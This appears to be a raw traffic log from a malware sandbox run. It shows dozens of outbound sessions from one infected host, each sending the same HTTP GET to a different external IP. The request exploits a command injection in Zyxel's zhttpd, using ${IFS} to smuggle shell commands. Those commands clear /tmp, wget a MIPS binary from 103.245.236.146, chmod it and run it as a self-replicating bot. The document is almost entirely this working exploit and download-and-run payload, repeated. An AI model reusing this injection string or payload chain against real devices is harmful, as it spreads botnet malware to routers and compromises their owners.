                                                Jan 28, 2024 10:16:34.958585978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6952192.168.2.234206091.113.244.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958626986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6953192.168.2.233653440.170.59.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958652020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6954192.168.2.235132625.215.243.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958669901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6955192.168.2.2352614130.133.135.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958712101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6956192.168.2.234259462.241.208.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958741903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6957192.168.2.2346796134.207.54.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958770037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6958192.168.2.2347314178.69.130.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958801031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6959192.168.2.2350428159.97.164.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958856106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6960192.168.2.2360126115.164.179.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958856106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6961192.168.2.233995260.239.181.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958874941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6962192.168.2.233783863.236.2.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958904982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6963192.168.2.235286696.123.108.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958935022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6964192.168.2.2339674183.172.129.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958966017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6965192.168.2.233282413.160.159.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959006071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6966192.168.2.2356958160.27.72.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959028006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6967192.168.2.235295057.121.42.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959072113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6968192.168.2.2351810148.60.35.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959072113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6969192.168.2.2341942112.150.163.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959125996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6970192.168.2.235498486.177.39.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959136963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6971192.168.2.233805224.133.136.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959167957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6972192.168.2.235933032.81.38.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959211111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6973192.168.2.2343772191.233.97.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959229946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6974192.168.2.234198679.106.21.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959238052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6975192.168.2.233901892.254.224.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959263086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6976192.168.2.2343192163.157.75.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959306002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6977192.168.2.2348820185.253.245.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959311962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6978192.168.2.233844280.164.92.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959335089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6979192.168.2.2338918182.99.21.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959383965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6980192.168.2.233307258.33.232.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959434986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6981192.168.2.2353138207.134.34.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959458113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6982192.168.2.2352868211.209.219.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959469080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6983192.168.2.234836090.120.205.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959527969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6984192.168.2.233507238.217.35.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959542990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6985192.168.2.233799663.44.67.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959574938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6986192.168.2.235887858.0.4.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959603071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6987192.168.2.234802877.43.231.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959640026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6988192.168.2.2357062171.104.128.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959670067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6989192.168.2.233426064.89.82.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959693909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6990192.168.2.235988214.191.15.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959726095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6991192.168.2.2345452168.193.219.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959753036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6992192.168.2.2340148219.137.142.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959820986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6993192.168.2.2352898216.104.3.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959836960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6994192.168.2.2335710195.206.99.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959852934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6995192.168.2.235793844.172.206.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959870100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6996192.168.2.234845092.148.203.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959898949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6997192.168.2.2349164138.245.224.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959939003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6998192.168.2.2347952132.238.228.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959963083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6999192.168.2.2357816196.59.168.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.959973097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7000192.168.2.2336690105.231.164.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.960040092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7001192.168.2.2333272181.108.194.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.960057020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7002192.168.2.2358352177.208.17.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.960059881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7003192.168.2.2358630141.71.30.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.960095882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7004192.168.2.2353514146.176.0.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.960128069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7005192.168.2.234442823.72.233.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.960161924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7006192.168.2.2332960121.220.15.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.960177898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7007192.168.2.234135287.133.41.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.960205078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7008192.168.2.235797448.4.220.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.960249901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7009192.168.2.2355328106.239.154.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.960278034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7010192.168.2.2339384163.235.43.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.960287094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7011192.168.2.2339024123.11.166.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.960308075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7012192.168.2.234167031.12.21.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.960346937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7013192.168.2.2341644221.72.103.162443
                                                TimestampBytes transferredDirectionData
